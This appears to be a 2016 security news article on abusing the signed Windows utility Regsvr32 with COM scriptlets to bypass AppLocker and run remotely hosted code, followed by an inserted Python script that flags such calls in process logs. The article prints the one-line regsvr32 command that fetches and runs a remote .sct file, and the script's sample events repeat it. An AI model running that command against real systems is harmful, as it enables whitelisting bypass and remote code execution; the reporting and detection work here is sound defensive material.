
Microsoft Windows Applocker circumvented by exploiting native OS utility to remote execute code

The native Windows command-line utility Regsvr32 can be abused to bypass Microsoft AppLocker and run remotely hosted code, sidestepping application-whitelisting protections.

A security researcher recently discovered a vulnerability that may well wreak havoc in the Windows world: it can be used to bypass application-whitelisting protections such as Microsoft’s AppLocker.

The binary in question, Regsvr32, is a Microsoft digitally signed native command-line utility used to register DLLs (dynamic link libraries); it is typically spawned when applications or software are installed on a Windows system.

Once the DLLs have been registered, the data and code they contain can be shared by one, two or many applications at the same time. However, a proof of concept by the security researcher showed that the call to the DLL, combined with COM Scriptlets (also known as .SCT files; more details at Inside COM+), is not limited to local access. In fact, it allowed the researcher to execute JavaScript or VBScript code sourced remotely from anywhere on the internet. Exploiting this vulnerability requires only minimal privileges, which makes the threat actor’s malicious job easy and seamless.

Once inside the network, the threat actor is able to run malicious code hosted anywhere on the internet. Moreover, the Regsvr32 command-line utility is proxy and SSL aware, which makes it a perfect and easy native tool to abuse.

“I have been researching fileless persistence mechanisms. And it led me to a dark place. I would wish on no mortal. COM+,” said the security researcher “subTee”. “I found a reference that stated that the [COM+] code in the registration element executes on register and unregister.” Intrigued, yet faced with the dilemma that executing the code by registering the DLL requires a privileged user, i.e. an Administrator or a user with elevated privileges, “subTee” decided to take a different approach: “I logged in as a normal user and right clicked the .sct file and chose ‘unregister’ and… It worked!”

Here is an example of the execution call:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

It is unclear whether this “feature” of the Regsvr32 command-line utility is by design or a design flaw, since little about the utility is documented on the Microsoft MSDN page. Irrespective of its intended use, however, it is clear that it can be used as an exploitation vehicle.

From the perspective of incident response and digital forensics, unless the analyst knows exactly what to look for, this sort of attack vector is very difficult to detect, as there are virtually no artifacts or remains to be found once the command has executed.
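Process-creation logging is the one place the execution call above does leave a trace. As an added example (not from the article or from subTee's proof of concept), the following Python script scans constructed Sysmon-style process-creation records for the indicators visible in that command line: a remote /i: argument, the scrobj.dll scriptlet host and the /u unregister switch. The flattened key=value layout, field names and sample events are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events in a flattened Sysmon-style
# "key=value" layout. They are illustrative and not taken from the article.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\regsvr32.exe CommandLine=regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\regsvr32.exe CommandLine=regsvr32.exe /s C:\\Vendor\\vendor.dll ParentImage=C:\\Vendor\\setup.exe",
    "Image=C:\\Windows\\SysWOW64\\regsvr32.exe CommandLine=REGSVR32.EXE /U /I:https://cdn.example.test/x.sct SCROBJ.DLL ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe notes.txt ParentImage=C:\\Windows\\explorer.exe",
]

EVENT_RE = re.compile(r"^Image=(?P<image>.+?) CommandLine=(?P<cmd>.+?) ParentImage=(?P<parent>.+)$")
REMOTE_RE = re.compile(r"^(?:https?|ftp)://|^\\\\", re.IGNORECASE)  # URL or UNC path


def parse_event(line: str) -> Dict[str, str]:
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError("unrecognised event layout: " + line)
    return m.groupdict()


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Return the indicators found in one regsvr32 process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    tokens = event["cmd"].lower().split()
    reasons: List[str] = []
    if image != "regsvr32.exe":
        return {"suspicious": False, "reasons": reasons}
    for tok in tokens:
        if tok.startswith("/i:") and REMOTE_RE.match(tok[3:]):
            reasons.append("remote scriptlet via /i:" + tok[3:])
    if "scrobj.dll" in tokens:
        reasons.append("scrobj.dll loaded (scriptlet host, not an ordinary DLL registration)")
    if "/u" in tokens and reasons:
        reasons.append("/u unregister path (works without elevated privileges, per the article)")
    # Any remote /i: argument or scrobj.dll use is enough to alert; plain local
    # registrations (installer parent, local DLL path) produce no reasons.
    return {"suspicious": bool(reasons), "reasons": reasons}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyze() over every event and return only the alerts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        verdict = analyze(ev)
        if verdict["suspicious"]:
            alerts.append({"cmd": ev["cmd"], "parent": ev["parent"], "reasons": verdict["reasons"]})
    return alerts
```

The parent process is kept in each alert because a regsvr32 spawned by cmd.exe or powershell.exe, rather than by an installer, is the context that separates the two flagged events from the legitimate registration.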

To date, Microsoft has yet to comment on or acknowledge this vulnerability, and it is unclear when Microsoft will issue a patch, if any; subTee privately disclosed it to Microsoft on Tuesday, 19 April 2016.

The proof-of-concept code is available on the GitHub repository.

Written by: Rami Shaath

Author Bio: Rami Shaath is a seasoned, accomplished professional with a diverse background and talents spanning technical, service-delivery and business-development disciplines in various roles, including project lead, across North America, Europe and the UAE. With SANS and ISC² certifications underway, his hunger to learn and advance is limitless. A hardware tweaker and open source enthusiast, Rami’s determination and perseverance are setting him on the long path to join the ranks of renowned leading experts in cyber security.


Edited by Pierluigi Paganini

(Security Affairs – Applocker, Microsoft)
